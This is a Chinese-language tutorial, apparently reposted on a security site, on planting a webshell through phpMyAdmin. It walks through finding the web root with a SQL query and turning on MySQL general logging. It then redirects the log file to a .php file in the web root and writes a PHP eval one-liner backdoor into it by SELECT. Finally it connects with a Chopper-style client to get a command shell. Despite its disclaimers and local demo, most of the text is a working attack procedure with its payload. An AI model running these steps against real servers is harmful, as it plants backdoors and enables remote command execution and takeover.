phpmyadmin提权教程

admin 2025年1月11日12:33:15评论3 views字数 796阅读2分39秒阅读模式

本次教程来自YanXia,转载请注明作者信息,博客地址http://www.535yx.cn,感谢
注意!!!本篇文章仅为技术文章,仅为教大家知识,不是教大家犯罪!!!!请勿在未授权的网站中胡乱使用。感谢!

0x00 介绍

phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL(3306)的数据库管理工具
这次教程我将在本地环境为大家演示如何在phpmyadmin提权。(别问为什么在本地演示,问就是看看《刑法》第二百八十五条 )

0x01 准备

一句话木马*1
xise菜刀*1
本地环境:这里我采用phpstudy2016下载地址https://www.xp.cn/download.html

0x02 正文

首先打开地址http://localhost/phpMyAdmin/
phpmyadmin提权教程

然后我们打开sql选项卡,我们需要先查询一下mysql的安装路径
select @@basedir
从而可以知道该网站目录
phpmyadmin提权教程

那么这就说明该网站跟目录为D:/phpStudy/WWW/
接下来我们就可以插入一句话了。
接下来我们利用日志功能写入一句话
首先我们先在sql选项卡里执行以下语句

SHOW VARIABLES LIKE 'general%'

这是用来查看general_log功能是否开启,接着我们手动吧Value值手动改为ON即可
phpmyadmin提权教程

接着我们就可以插入一句话啦

SET global general_log_file='D:\phpStudy\WWW\yanxia.php';
select '<?php eval($_POST[yanxia]);?>';

phpmyadmin提权教程

phpmyadmin提权教程

phpmyadmin提权教程

看文件成功写入啦
写下来我们打开菜刀进行连接
phpmyadmin提权教程

phpmyadmin提权教程

最后我们打开菜刀右下角cmd框进行之后的提权操作(之后的操作不在今天的课程范围,所以不做演示)

0x03 结尾

感谢大家的观看,谢谢!!!!(转载请带上原文地址并告知下本人,谢谢支持)

©著作权归作者所有 - source: 535yx.cn

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月11日12:33:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpmyadmin提权教程https://cn-sec.com/archives/3619481.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息